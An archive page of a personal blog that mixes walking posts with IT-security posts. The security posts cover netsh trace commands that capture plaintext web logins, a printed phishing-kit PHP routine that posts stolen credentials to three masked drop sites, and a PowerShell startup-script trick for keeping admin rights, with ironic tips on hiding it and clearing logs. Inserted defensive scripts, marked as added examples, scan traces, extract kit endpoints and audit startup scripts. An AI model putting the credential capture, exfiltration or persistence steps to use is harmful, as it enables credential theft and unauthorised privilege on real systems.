Category Archives: Fun

A 5k from Dormagen to Leverkusen

21 September 2016

For some weeks now I have been trying to cycle to work at least two days a week. The distance from Dormagen to my office in Leverkusen is 19 km. I need about an hour in the morning, which is about 7,500 steps, or roughly a 5k walk.

The countryside along the Rhine dam is truly beautiful, in particular shortly after sunrise:

The Rhine dam between Dormagen and Cologne

Have a good day, and a great 5k.

netsh – The Cyber Attacker’s Tool of Choice

3 February 2016

For IT pros the Windows built-in command netsh is one of the tools of choice for troubleshooting network issues.

For a cyber attacker netsh is the tool of choice once he has managed to get access to the company network. 'netsh trace' can record the data a user submits, e.g. to the login dialog of a web application or a banking application, in plain text. The trace is taken inside the Windows HTTP client APIs that applications such as Internet Explorer are built on, before TLS encrypts the request, so a password posted over HTTPS still shows up readable in the trace file.

Using netsh trace is disturbingly easy:

[1] Start the recording session for programs connecting to internet services

netsh trace start scenario=InternetClient capture=yes tracefile=NetTrace-ICP.etl level=4

[2] Wait for the user to connect to a service …

[3] Stop the recording session

netsh trace stop

[4] Convert the trace file into readable format

netsh trace convert input=NetTrace-ICP.etl output=NetTrace-ICP.etl.xml dump=XML

[5] Open the file with Notepad and search for the user name. It is URL-encoded in the trace, so search for donot.like%40get.phished:

<EventData>
<Data Name="RequestHandle">0xCC000C</Data>
<Data Name="Length">502</Data>
<Data Name="Headers">loginfmt=donot.like%40get.phished&amp;passwd=-Plain-Text-Here-&amp;login=donot.like%40get.phished&amp;……</Data>
</EventData>
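Searching the converted XML by hand, as in step [5], does not scale once the trace holds thousands of events. The script below is an added example, not part of the original post: it walks a converted trace, decodes every form-urlencoded request body and reports which requests carried a secret-looking field, without copying the secret itself into the report. SAMPLE_TRACE is a constructed sample shaped like the EventData fragment above; the Data names RequestHandle, Length and Headers come from the post, while the Events/Event wrapper, the namespace declaration and the two extra events are assumptions made so the sample runs and exercises the filters.

```python
"""Scan a converted netsh trace (XML) for plaintext credentials.

Added example, not part of the original post. The sample trace below is
constructed: the Data names come from the post, the Events/Event wrapper,
the namespace and the two extra events are assumptions.
"""
import re
import sys
import xml.etree.ElementTree as ET
from urllib.parse import parse_qsl

# Form field names that usually carry a secret (assumed heuristic list, extend as needed).
SECRET_FIELD = re.compile(r"pass|pwd|pin|secret|token|otp", re.IGNORECASE)

SAMPLE_TRACE = """<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <Event>
    <EventData>
      <Data Name="RequestHandle">0xCC000C</Data>
      <Data Name="Length">502</Data>
      <Data Name="Headers">loginfmt=donot.like%40get.phished&amp;passwd=-Plain-Text-Here-&amp;login=donot.like%40get.phished</Data>
    </EventData>
  </Event>
  <Event>
    <EventData>
      <Data Name="RequestHandle">0xCC0010</Data>
      <Data Name="Headers">q=netsh+trace&amp;lang=en</Data>
    </EventData>
  </Event>
  <Event>
    <EventData>
      <Data Name="RequestHandle">0xCC0014</Data>
      <Data Name="Headers">GET /index.html HTTP/1.1</Data>
    </EventData>
  </Event>
</Events>"""


def local_name(tag):
    """Strip the XML namespace that a converted trace declares on its elements."""
    return tag.rsplit("}", 1)[-1]


def find_credentials(trace_xml):
    """Return one dict per request body that contains a secret-looking field.

    Values of secret fields are not copied into the result, so the report
    does not become a second plaintext copy of the password.
    """
    findings = []
    for element in ET.fromstring(trace_xml).iter():
        if local_name(element.tag) != "EventData":
            continue
        fields = {d.get("Name"): (d.text or "")
                  for d in element if local_name(d.tag) == "Data"}
        body = fields.get("Headers", "")
        if "=" not in body:                      # not a form-urlencoded body
            continue
        pairs = parse_qsl(body, keep_blank_values=True)   # also decodes %40 -> @
        secrets = [name for name, _ in pairs if SECRET_FIELD.search(name)]
        if not secrets:
            continue
        findings.append({
            "request": fields.get("RequestHandle"),
            "secret_fields": secrets,
            "other_fields": {n: v for n, v in pairs if not SECRET_FIELD.search(n)},
        })
    return findings


if __name__ == "__main__":
    # Usage: python scan_trace.py NetTrace-ICP.etl.xml   (defaults to the built-in sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            xml_text = fh.read()
    else:
        xml_text = SAMPLE_TRACE
    for hit in find_credentials(xml_text):
        print(f"request {hit['request']}: secret fields {hit['secret_fields']}, "
              f"other fields {hit['other_fields']}")
```

Run against the real NetTrace-ICP.etl.xml the output tells you which requests leaked a credential and under which user name, which is what you need to decide whose passwords must be changed after a trace has been taken.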

Thus netsh trace can replace key loggers or tools like Mimikatz or LaZagne for harvesting the credentials a user sends to web applications. Since the attacker need not download additional utilities from the C&C server, the likelihood of detection decreases.

Fortunately the attacker must run netsh trace in an administrative context, but since many users always work with admin rights this is not a real hurdle.

Apart from cyber attacks, users should be concerned about privacy. If a support technician starts a netsh trace in a remote troubleshooting session, there is a good chance that he sees your password or PIN. To be on the safe side, change your passwords after netsh trace has been used to solve a network issue.

Take care!

A 5k walk along the Levada do Caldeirão Verde in Madeira

7 November 2015

During the week from October 26 to 31 we were on vacation in Madeira. We went hiking nearly every day, usually far more than 5 km.

On Saturday we walked along the walkway of the Levada do Caldeirão Verde. Although it was raining almost all day this was the most beautiful hike during our vacation.


We made in total 13 km, but it was fun nonetheless.

Have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exciting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design but showed a somewhat different method of POST processing. Since one of the landing sites was open to everyone, I had the chance to make a copy of the PHP procedure that processes the POST:

…
// One record per victim: credentials plus IP, browser and host name, '#'-separated.
$data = "#$user#$pass#:#$ip#$browser#$hostname";
// The drop sites; every record is forwarded to all three.
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) {
    global $textHos;   // unused leftover in the kit
    // Wrap the record in a form field and POST it to the drop site.
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);   // the drop site's response is ignored
}
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to three sites for further processing.
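When you get hold of a kit like the one above, the two things worth extracting are the exfiltration endpoints (drop URLs or mail addresses) for reporting and blocking, and the record layout, so that the same '#'-separated string can be recognised in proxy or mail logs. The script below is an added example, not part of the original post or of the kit: KIT_SOURCE is a constructed sample modelled on the fragment above; the three URL placeholders are taken from the post, while the mail() call and the addresses in it are assumptions that stand in for the mail-based kits the post mentions.

```python
"""Pull exfiltration endpoints and the record layout out of a phishing kit.

Added example, not part of the original post. KIT_SOURCE is a constructed
sample: the URLs are the placeholders from the post, the mail() call and
the e-mail addresses are assumptions.
"""
import re
from urllib.parse import urlparse

KIT_SOURCE = r'''<?php
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
$to = "drop.one@example.net, drop.two@example.org";   // assumed mail drop
mail($to, "New Login", $data, "From: admin@example.net");
foreach ($sites as $site) { writeit($data,$site); }
'''

URL_RE = re.compile(r'''["'](https?://[^"'\s]+)["']''')
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DATA_RE = re.compile(r'\$data\s*=\s*"([^"]*)"')


def extract_endpoints(source):
    """Quoted http(s) URLs and e-mail addresses found in the kit source."""
    return {
        "urls": sorted(set(URL_RE.findall(source))),
        "emails": sorted(set(EMAIL_RE.findall(source))),
    }


def drop_hosts(source):
    """Hostnames to block or report, from the drop URLs and the mail domains."""
    found = extract_endpoints(source)
    hosts = {urlparse(u).hostname for u in found["urls"]}      # hostname is lower-cased
    hosts |= {addr.split("@", 1)[1].lower() for addr in found["emails"]}
    return sorted(hosts)


def record_fields(source):
    """Field order of the victim record, e.g. ['user', 'pass', 'ip', ...]."""
    match = DATA_RE.search(source)
    return re.findall(r"\$(\w+)", match.group(1)) if match else []


def record_pattern(source):
    """Regex matching one exfiltrated record, for grepping proxy or mail logs.

    Each $var becomes a named group; literal separators are kept. Fields are
    assumed not to contain the '#' separator themselves.
    """
    match = DATA_RE.search(source)
    if not match:
        return None
    parts = re.split(r"\$(\w+)", match.group(1))   # literal, var, literal, var, ...
    pattern = "".join(re.escape(p) if i % 2 == 0 else f"(?P<{p}>[^#]*)"
                      for i, p in enumerate(parts))
    return re.compile(pattern)


if __name__ == "__main__":
    print("endpoints:", extract_endpoints(KIT_SOURCE))
    print("hosts to block:", drop_hosts(KIT_SOURCE))
    print("record layout:", record_fields(KIT_SOURCE))
    print("record regex:", record_pattern(KIT_SOURCE).pattern)
```

The hostnames are the part to submit to a blocklist or to the hoster; the record regex lets you confirm from your own outbound proxy logs whether any of your users posted a record to one of the drop sites.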

I checked the phishing landing pages with VirusTotal.com but found that in most cases the sites were not rated as malicious. Even after 5 days only 10 of 65 scanners classified the pages as malicious or phishing sites.

What surprised me was that most of the pages were listed in blacklist databases. Check the landing page of a phishing mail with e.g. IP INDETAIL; it is very likely that the site is already blacklisted.

And it's really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant; unfortunately no one seems to be interested in turning it into actionable knowledge.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the Anti-Phishing Working Group (APWG) and the National Cyber Security Alliance (NCSA). The campaign's slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about two-factor authentication and tips for safe use of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Unhandled program exceptions and informative error messages – free support for Cyber Attackers

30 August 2015

Today companies know their business-critical information and protect it against unauthorized use and disclosure.

Cyber criminals don't attack the business-critical information directly, but the application systems, through vulnerabilities in the system and application software. Application and system developers make life easy for them by disclosing information about the system design through unhandled program exceptions and informative error messages.

Unhandled program exceptions exist in almost every web application. Candidates are URLs with parameters like

https://xxxxx.xxxxxxx.com/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?Page=HRS_CE_HM_PRE
&Action=A&SiteId=11&languageCd=GER

Most programmers test in depth to make sure that the program retrieves exactly the information defined in the requirements specification. But what happens if an invalid value is entered?

Let's rewrite this URL and assign SiteId the value -1:

https://xxxxx.xxxxxxx.com/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?Page=HRS_CE_HM_PRE
&Action=A&SiteId=-1&languageCd=GER

The result is:

A negative number was assigned to an Attribute of type "Unsigned": HRS_SITE_ID.HRS_SITE_ID. (2,121) WEBLIB_XXXXXXXX.ISCRIPT_ XXXXXXXX.FieldFormula Name:ax_Parameter_security PCPC:1176 Statement:19 Called from:WEBLIB_ XXXXXXXX.ISCRIPT_ XXXXXXXX.FieldFormula Name:Iscript_Load XXXXXXXX Portal Statement:28

Okay, it's not the entire program stack, but it shows that the input is not fully validated, and it discloses internal names: the HRS_SITE_ID field, the WEBLIB_ and ISCRIPT_ program names and the statement numbers. That gives an attacker a map of the application and a hint that the site may also be vulnerable to SQL injection.

Unchecked error conditions are listed as CWE-391 in the Common Weakness Enumeration. Programmers can easily solve this problem by adding a catch-all exception handler (PL/SQL's WHEN OTHERS, for example) that logs the details server-side and returns a generic message to the client.

The best error message is one that reveals neither information about the application system nor about the internal structure of the application:

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable. Please excuse the inconvenience caused.

Period. For a good overview about error handling problems and mitigations see the SANS Securing Web Application Technologies (SWAT) checklist.
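To make the boundary value test concrete, here is an added example, not from the original post and not code from the application whose error is shown above. It models the SiteId parameter of that URL with two request handlers: one that lets the exception escape to the client, which is the behaviour the post demonstrates, and one that validates the input, catches everything else, logs the detail server-side and returns only the generic message recommended above. A small driver runs a list of boundary values through either handler and reports which inputs made it reveal internal detail. The site table, the Unsigned check and the boundary values are assumptions made for the example.

```python
"""Boundary-value input on a request parameter: leaking vs. generic errors.

Added example, not from the original post. The site table, the Unsigned
check and the boundary values are assumptions made for the example.
"""
import logging
import re
from urllib.parse import parse_qs, urlparse

log = logging.getLogger("hrs")

SITES = {11: "Careers site"}              # assumed lookup table behind SiteId
GENERIC_ERROR = ("The resource you are looking for might have been removed, "
                 "had its name changed, or is temporarily unavailable. "
                 "Please excuse the inconvenience caused.")
BASE_URL = ("https://xxxxx.xxxxxxx.com/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL"
            "?Page=HRS_CE_HM_PRE&Action=A&SiteId=11&languageCd=GER")
# Assumed boundary values: negative, zero, unknown id, overflow, text, empty, float, NUL byte
BOUNDARY_VALUES = ["-1", "0", "11", "99", "2147483648", "abc", "", "1e3", "11%00"]


class UnsignedAttributeError(ValueError):
    """Stand-in for the framework's 'negative number assigned to Unsigned' error."""


def load_site(site_id):
    """Innermost layer: raises with internal names, like the message in the post."""
    if site_id < 0:
        raise UnsignedAttributeError(
            'A negative number was assigned to an Attribute of type "Unsigned": '
            f"HRS_SITE_ID.HRS_SITE_ID ({site_id})")
    return SITES[site_id]                 # KeyError for ids that do not exist


def handle_unsafe(url):
    """No validation, no handler: whatever blows up reaches the client."""
    params = parse_qs(urlparse(url).query)
    site_id = int(params["SiteId"][0])    # ValueError on non-numeric input
    return 200, load_site(site_id)


def handle_hardened(url):
    """Validate first, catch everything else, tell the client nothing internal."""
    params = parse_qs(urlparse(url).query)
    raw = params.get("SiteId", [""])[0]
    # Allowlist: 1 to 9 ASCII digits, so negatives, floats, NULs and huge values never get further
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        log.warning("rejected SiteId=%r", raw)
        return 404, GENERIC_ERROR
    try:
        return 200, load_site(int(raw))
    except Exception:                     # catch-all (CWE-391): details go to the log only
        log.exception("SiteId=%s failed", raw)
        return 404, GENERIC_ERROR


def leaking_inputs(handler):
    """Boundary-value test: which inputs make the handler reveal internal detail?"""
    leaked = []
    for value in BOUNDARY_VALUES:
        url = BASE_URL.replace("SiteId=11", f"SiteId={value}")
        try:
            status, body = handler(url)
        except Exception as exc:          # an unhandled exception is what the user would see
            status, body = 500, f"{type(exc).__name__}: {exc}"
        if status != 200 and body != GENERIC_ERROR:
            leaked.append(value)
    return leaked


if __name__ == "__main__":
    print("unsafe handler leaks on:", leaking_inputs(handle_unsafe))
    print("hardened handler leaks on:", leaking_inputs(handle_hardened))
```

The point of the driver is that the hardened handler still fails for every bad input, it just fails the same way each time; the details needed to debug the failure are in the server log, not in the response.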

Have a good weekend, and fun with boundary value tests.

Nomination for the “Most-Slanting-Phishing-Site-of-the-Year” award

10 July 2015

I receive about 20 phishing mails a week. Most attackers invest a lot of effort in their counterfeits, but sometimes they overshoot the mark. My July candidate for the Most-Slanting-Phishing-Site-of-the-Year award is:

Most-Slanting-Phishing-Site-of-the-Year award – July 2015 candidate

Earlier this week the Italian company Hacking Team was hacked. The attackers made more than 400 GB of confidential company data available to the public. The leaked data included the tools and exploits the company provided to carry out attacks, among them a new Flash Player zero-day affecting Flash Player up to version 18.0.0.194.

Two critical vulnerabilities in as many weeks, that's really annoying. The problem with the latest Flash Player attacks is that the payload is hidden in SWF files. Thus, basically every SWF file might carry a malicious payload…

… It’s definitely time to solve the Flash Player problems once and for all.

Have a good weekend.

HACKADAY: Keystroke Sniffer Hides as a Wall Wart, is Scary

22 January 2015

Samy's video 'Keystroke Sniffer Hides as a Wall Wart, is Scary' is well worth seeing.

A keystroke sniffer that records and decrypts keystrokes sent from a wireless keyboard: simply brilliant, and truly frightening. In offices where business-critical information is processed, wireless keyboards should be banned as soon as possible.

What really worries me is that, in the fight against the omnipresent danger from the Internet, we miss the obvious under our fingers.

Enjoy the video.

Don’t panic!

Fun with 24h Admin Rights

19 January 2015

Once you have granted 24h admin rights to a user, he can make himself an administrator for good with just a few clicks. Startup scripts offer an easy way to do this.

About startup scripts.

With startup scripts Windows offers administrators a powerful tool to run commands at system boot. The scripts are stored in the directory %windir%\System32\GroupPolicy\Machine\Scripts\Startup and run with SYSTEM privileges.

But just copying a script to the Startup directory is not sufficient to get it executed. Because startup scripts could easily be used to compromise a system, they have to be registered through the Local Group Policy Editor gpedit.msc, and registering a startup script with gpedit.msc requires local admin privileges. That is exactly what the 24h admin rights provide.

3 Steps for 24h admins to get admin privileges again.

  1. Create a PowerShell script that adds your user account to the local Administrators group.

# addMalUser.ps1
# Fill in the values of the USERDOMAIN, COMPUTERNAME and USERNAME environment variables.
$Domain   = "YourDomain"
$Computer = "YourComputer"
$Username = "YourUsername"

# Bind to the local Administrators group and to the domain account via the WinNT ADSI provider.
$Group = [ADSI]"WinNT://$Computer/Administrators,group"
$User  = [ADSI]"WinNT://$Domain/$Username,user"

# Add the account to the group. At boot the script runs as SYSTEM, so no further rights are needed.
$Group.Add($User.Path)

Save this script as addMalUser.ps1. To get the exact values for $Domain, $Computer and $Username, run set in a command prompt and look at USERDOMAIN, COMPUTERNAME and USERNAME.

  2. Copy addMalUser.ps1 to %windir%\System32\GroupPolicy\Machine\Scripts\Startup.

  3. Start gpedit.msc, go to Computer Configuration > Windows Settings > Scripts (Startup/Shutdown) > Startup, and add addMalUser.ps1 on the PowerShell Scripts tab.

Gpedit Add Startup Script dialog
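The defensive counterpart to the three steps above is to audit what is actually registered. Registering a script with gpedit.msc records it in scripts.ini (batch and exe scripts) or psscripts.ini (PowerShell scripts) in the Scripts folder next to Startup; a script that is merely copied into Startup does not appear there. The parser below is an added example, not part of the original post: it reads those INI files, lists the registered entries and flags any script that is not on an allowlist, so an addition like addMalUser.ps1 stands out. SAMPLE_INI is a constructed sample in the layout gpedit writes; the allowlist and the inventory.ps1 entry are assumptions.

```python
"""Audit the startup scripts registered in the local Group Policy.

Added example, not part of the original post. SAMPLE_INI is a constructed
sample; the allowlist and the inventory.ps1 entry are assumptions.
"""
import ntpath
import os
import re

SCRIPTS_DIR = r"C:\Windows\System32\GroupPolicy\Machine\Scripts"
INI_FILES = ("scripts.ini", "psscripts.ini")
ALLOWLIST = frozenset({"inventory.ps1"})      # assumed: scripts the organisation deployed itself

SAMPLE_INI = """
[Startup]
0CmdLine=inventory.ps1
0Parameters=-Quiet
1CmdLine=addMalUser.ps1
1Parameters=
[Shutdown]
"""

ENTRY_RE = re.compile(r"(\d+)(CmdLine|Parameters)=(.*)", re.IGNORECASE)


def parse_script_ini(text):
    """Return registered scripts as [{'section', 'index', 'cmdline', 'parameters'}]."""
    entries = {}
    section = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        match = ENTRY_RE.fullmatch(line)
        if not match or section is None:
            continue
        index, key, value = int(match.group(1)), match.group(2).lower(), match.group(3)
        entry = entries.setdefault(
            (section, index),
            {"section": section, "index": index, "cmdline": "", "parameters": ""})
        entry[key] = value
    return [entries[k] for k in sorted(entries)]


def unexpected_scripts(entries, allowlist):
    """Entries whose script file name (case-insensitive) is not on the allowlist."""
    allowed = {name.lower() for name in allowlist}
    return [e for e in entries if ntpath.basename(e["cmdline"]).lower() not in allowed]


def read_ini(path):
    """gpedit typically writes these files as UTF-16 with a BOM; hand-edited ones may be UTF-8."""
    with open(path, "rb") as fh:
        raw = fh.read()
    bom = raw.startswith((b"\xff\xfe", b"\xfe\xff"))
    return raw.decode("utf-16" if bom else "utf-8-sig")


def audit(scripts_dir=SCRIPTS_DIR, allowlist=ALLOWLIST):
    """Unexpected entries from every INI file present in the Scripts folder."""
    report = []
    for name in INI_FILES:
        path = os.path.join(scripts_dir, name)
        if os.path.exists(path):
            for e in unexpected_scripts(parse_script_ini(read_ini(path)), allowlist):
                report.append((name, e["section"], e["index"], e["cmdline"], e["parameters"]))
    return report


if __name__ == "__main__":
    for hit in audit():
        print(f"{hit[0]} [{hit[1]}] #{hit[2]}: {hit[3]} {hit[4]}")
```

Run on the workstation itself (or with the Scripts folder copied off it) this gives a quick answer to the question the post raises: has a 24h admin left something behind that runs as SYSTEM at the next boot?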

Tips for would-be malicious users.

  1. Please note that this operation is recorded in the Security Event Log of your computer.
     Never mind! Only very few organizations scan the security events of user workstations, and those which tolerate 24h admin rights are certainly not among them.

  2. Please feel free to add switches to this script so that it runs on demand only. This helps to hide your malicious activities, because you can remove yourself from the Administrators group or clear the Security Event Log after the job is done.

Have Fun with 24h Admin Rights!